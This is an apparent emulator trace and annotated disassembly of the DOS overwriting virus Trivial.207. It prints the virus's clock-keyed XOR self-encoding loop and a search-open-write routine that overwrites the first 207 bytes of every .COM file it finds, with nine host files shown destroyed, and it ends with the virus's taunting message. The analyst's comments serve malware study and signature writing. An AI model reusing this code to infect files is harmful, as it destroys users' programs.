Sample viewer

vx.netlux.org/Virus.DOS.Trivial.207.a


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:01:40.693394065Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
; Disassembly window printed by the emulator next to the "Get time" trace row
; (16-bit real-mode code; the int 0x21 calls are the DOS services named in the trace).
; The window is cut at both ends: the routine starts before 0x12a59 and continues
; past 0x12a86, so register state set up outside it is hedged below.
;
; What the visible code does:
;   * The instruction just before this window (0x12a59) stores DL at [0x109] right
;     after the "Get time" service returns, so the XOR key used below is one byte
;     taken from the clock (DL is the hundredths-of-a-second field for DOS Get time,
;     so presumably only the values 0..99 occur).
;   * It then XOR-encodes a byte run from offset 0x112 into a buffer at 0x1d9,
;     searches for a file, and opens the match for writing.
;   * In the trace every open is followed by an 18-byte and a 189-byte write with no
;     seek in between, i.e. 18 + 189 = 207 bytes are written from the start of each
;     matched file. The original leading bytes of the host are overwritten; nothing
;     in the trace shows them being saved.
; NOTE(review): 0x112 - 0x100 = 18, so the 18-byte write is presumably the
; unencoded bytes at 0x100..0x111 of a .COM image (which would include the key byte
; at 0x109), and the 189-byte write the encoded copy at 0x1d9 - confirm against the
; sample bytes. If so, the 18-byte part differs between copies only in the key byte
; and is the stable region for signature matching; the rest varies with the key.
0x12a5d: mov si, 0x112                  ; SI = source offset of the bytes to encode
0x12a60: mov di, 0x1d9                  ; DI = destination offset for the encoded copy
0x12a63: mov cx, 0xbd                   ; 0xbd = 189, the size of the second write in the trace
0x12a66: lodsb al, byte ptr [si]        ; loop top: AL = [SI]; SI steps (assumes DF clear - not visible here)
0x12a67: xor al, byte ptr [0x109]       ; single-byte XOR with the clock-derived key
0x12a6b: stosb byte ptr es:[di], al     ; store encoded byte at ES:[DI]; DI steps
0x12a6c: dec cx
0x12a6d: cmp cx, -1                     ; exit only once CX has wrapped to 0xFFFF, so the body
0x12a70: jne 0x12a66                    ;   runs 0xbd + 1 = 190 times, one byte past the 189 written
0x12a72: pop ax                         ; AX was pushed outside this window; the trace reports service 78 (Find first)
                                        ;   on the first pass and 79 (Find next) afterwards - presumably AH=4Eh/4Fh
0x12a73: xor cx, cx                     ; CX = 0: attribute mask for the file search
0x12a75: mov dx, 0x1c9                  ; DS:DX -> search pattern; contents not shown, every match in the trace is *.COM
0x12a78: int 0x21
0x12a7a: jb 0x12aa3                     ; CF set = no (more) matches; target is outside this window. In the trace the
                                        ;   last Find next is followed by Display string and Terminate
0x12a7c: mov ax, 0x3d01                 ; AH=3Dh open existing file, AL=01 write-only access
0x12a7f: mov dx, 0x9e                   ; 0x9e = 0x80 + 0x1e: file-name field of the default DTA in the PSP
                                        ;   (assumes the DTA was not relocated - TODO confirm)
0x12a82: int 0x21
0x12a84: mov bx, ax                     ; handle -> BX; no CF check between the open and this move, so a failed
                                        ;   open would pass an error code on as the handle
0x12a86: mov ah, 0x40                   ; AH=40h write to handle; CX/DX setup and the int 0x21 lie past the window
2018-12-17T23:01:40.696047481Z 78 PC: 12a7a | Find first file
2018-12-17T23:01:40.703388124Z 61 PC: 12a84 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:01:40.710622618Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T23:01:40.717668788Z 64 PC: 12a9a | Write file or device (Write 189 bytes on handle 5)
2018-12-17T23:01:40.721831239Z 62 PC: 12a9e | Close file
2018-12-17T23:01:40.738791507Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x1d9
0x12a63: mov cx, 0xbd
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x1c9
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T23:01:40.74162449Z 79 PC: 12a7a | Find next file
2018-12-17T23:01:40.745711199Z 61 PC: 12a84 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:01:40.752799057Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T23:01:40.75994265Z 64 PC: 12a9a | Write file or device (Write 189 bytes on handle 5)
2018-12-17T23:01:40.764007358Z 62 PC: 12a9e | Close file
2018-12-17T23:01:40.774660806Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x1d9
0x12a63: mov cx, 0xbd
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x1c9
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T23:01:40.777437553Z 79 PC: 12a7a | Find next file
2018-12-17T23:01:40.780891513Z 61 PC: 12a84 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:01:40.789091591Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T23:01:40.797221417Z 64 PC: 12a9a | Write file or device (Write 189 bytes on handle 5)
2018-12-17T23:01:40.80078869Z 62 PC: 12a9e | Close file
2018-12-17T23:01:40.810018834Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x1d9
0x12a63: mov cx, 0xbd
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x1c9
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T23:01:40.812316511Z 79 PC: 12a7a | Find next file
2018-12-17T23:01:40.815156498Z 61 PC: 12a84 | Open file (Filename = 'PHANG.COM')
2018-12-17T23:01:40.823557594Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T23:01:40.831620753Z 64 PC: 12a9a | Write file or device (Write 189 bytes on handle 5)
2018-12-17T23:01:40.83589222Z 62 PC: 12a9e | Close file
2018-12-17T23:01:40.843376442Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x1d9
0x12a63: mov cx, 0xbd
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x1c9
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T23:01:40.845688266Z 79 PC: 12a7a | Find next file
2018-12-17T23:01:40.848044804Z 61 PC: 12a84 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:01:40.855883894Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T23:01:40.863030012Z 64 PC: 12a9a | Write file or device (Write 189 bytes on handle 5)
2018-12-17T23:01:40.865969666Z 62 PC: 12a9e | Close file
2018-12-17T23:01:40.875319033Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x1d9
0x12a63: mov cx, 0xbd
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x1c9
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T23:01:40.877847715Z 79 PC: 12a7a | Find next file
2018-12-17T23:01:40.880698521Z 61 PC: 12a84 | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:01:40.887846312Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T23:01:40.895268428Z 64 PC: 12a9a | Write file or device (Write 189 bytes on handle 5)
2018-12-17T23:01:40.89801543Z 62 PC: 12a9e | Close file
2018-12-17T23:01:40.906869156Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x1d9
0x12a63: mov cx, 0xbd
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x1c9
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T23:01:40.909454795Z 79 PC: 12a7a | Find next file
2018-12-17T23:01:40.912388177Z 61 PC: 12a84 | Open file (Filename = 'PAH.COM')
2018-12-17T23:01:40.919785275Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T23:01:40.928653889Z 64 PC: 12a9a | Write file or device (Write 189 bytes on handle 5)
2018-12-17T23:01:40.931641794Z 62 PC: 12a9e | Close file
2018-12-17T23:01:40.940247454Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x1d9
0x12a63: mov cx, 0xbd
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x1c9
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T23:01:40.943797424Z 79 PC: 12a7a | Find next file
2018-12-17T23:01:40.946768026Z 61 PC: 12a84 | Open file (Filename = 'TEST.COM')
2018-12-17T23:01:40.953834033Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T23:01:40.958081845Z 64 PC: 12a9a | Write file or device (Write 189 bytes on handle 5)
2018-12-17T23:01:40.960978969Z 62 PC: 12a9e | Close file
2018-12-17T23:01:40.969432623Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x1d9
0x12a63: mov cx, 0xbd
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x1c9
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T23:01:40.972809548Z 79 PC: 12a7a | Find next file
2018-12-17T23:01:40.975641259Z 9 PC: 12aac | Display string (String= 'A vir 4 da simple minded people of earth Since ya didn't notice dis vir.. YAR LAME....')
2018-12-17T23:01:40.981848443Z 76 PC: 12ab0 | Terminate with return code (Return code = '36')